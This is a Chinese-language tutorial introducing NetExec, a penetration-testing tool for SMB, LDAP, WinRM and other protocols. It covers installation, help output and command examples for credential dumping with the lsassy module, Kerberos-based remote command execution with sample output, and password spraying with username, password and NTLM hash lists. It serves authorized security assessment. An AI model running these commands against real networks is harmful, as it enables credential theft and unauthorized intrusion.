NetExec:一款功能强大的自动化网络安全评估与漏洞测试工具

NetExec:一款功能强大的自动化网络安全评估与漏洞测试工具_第1张图片

关于NetExec

NetExec是一款功能强大的自动化网络安全评估与漏洞测试工具,该工具可以帮助广大研究人员以自动化的形式测试大型网络的安全,并通过利用网络服务漏洞来评估目标网络的安全态势。

支持的协议

1、SMB协议

2、LDAP协议

3、WinRM协议

4、MSSQL协议

5、SSH协议

6、FTP协议

7、RDP协议

8、WMI协议

工具安装

Unix安装

广大研究人员可以使用pipx系统全局安装:

apt install pipx git

pipx ensurepath

pipx install git+https://github.com/Pennyw0rth/NetExec

然后直接运行即可:

NetExec

nxcdb

我们还可以使用Poetry来安装:

apt-get install -y libssl-dev libffi-dev python-dev-is-python3 build-essential

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

poetry install

poetry run NetExec

或者使用pip安装:

apt install python3 python3-pip

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

python3 -m venv .

source bin/activate

pip install .

NetExec

Windows安装

如果你是Windows用户的话,可以直接访问该项目的【Releases页面】下载最新版本的NetExec预编译版本,解压后直接在命令行窗口中运行即可使用。

工具使用

工具命令参数

#~ nxc --help

usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--no-progress] [--verbose] [--debug] [--version] {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql} ...

 

    <-- Banner -->   

 

options:

  -h, --help               显示工具帮助信息和退出

  -t THREADS            设置并行线程数量(默认:100)

  --timeout TIMEOUT     设置每个线程的超时时间(默认:None)

  --jitter INTERVAL       设置每次连接的随机时间间隔(默认:None)

  --no-progress          在扫描过程中不显示进度条

  --verbose              启用Verbose模式

  --debug               启用调试模式

  --version              显示工具版本信息

 

protocols:

  available protocols

 

  {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql}

    smb                 使用SMB协议

    ssh                 使用SSH协议

    ldap                使用LDAP协议

    ftp                 使用FTP协议

    wmi                 使用WMI协议

    winrm               使用WINRM协议

    rdp                 使用RDP协议

    vnc                 使用VNC协议

    mssql               使用MSSQL协议

模块使用

查看可用模块:

nxc smb -L

使用一个模块:

nxc smb  -u Administrator -p 'October2022' -M lsassy

查看模块选项:

nxc smb -M lsassy --options

使用模块选项:

nxc   -u Administrator -p 'P@ssw0rd' -M lsassy -o COMMAND=xxxxxxxxug'

Kerberos使用

$ sudo nxc smb zoro.gold.local -k -u bonclay -p Ocotober2022

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay

或使用--use-kcache:

$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache

$ nxc smb zoro.gold.local --use-kcache

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)

$ sudo nxc smb zoro.gold.local --use-kcache -x whoami

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)

SMB         zoro.gold.local 445    ZORO             [+] Executed command

SMB         zoro.gold.local 445    ZORO             gold\administrator

 

$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache

$ sudo nxc smb zoro.gold.local --use-kcache -x whoami

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay

爆破&密码喷射

netexec   -u username1 -p password1 password2

netexec   -u username1 username2 -p password1

netexec   -u ~/file_containing_usernames -p ~/file_containing_passwords

netexec   -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

netexec   -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce

netexec   -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce

许可证协议

本项目的开发与发布遵循BSD-2-Clause开源许可证协议。

项目地址

NetExec:【GitHub传送门】

参考资料

Welcome - NetExec

你可能感兴趣的:(自动化,web安全,运维)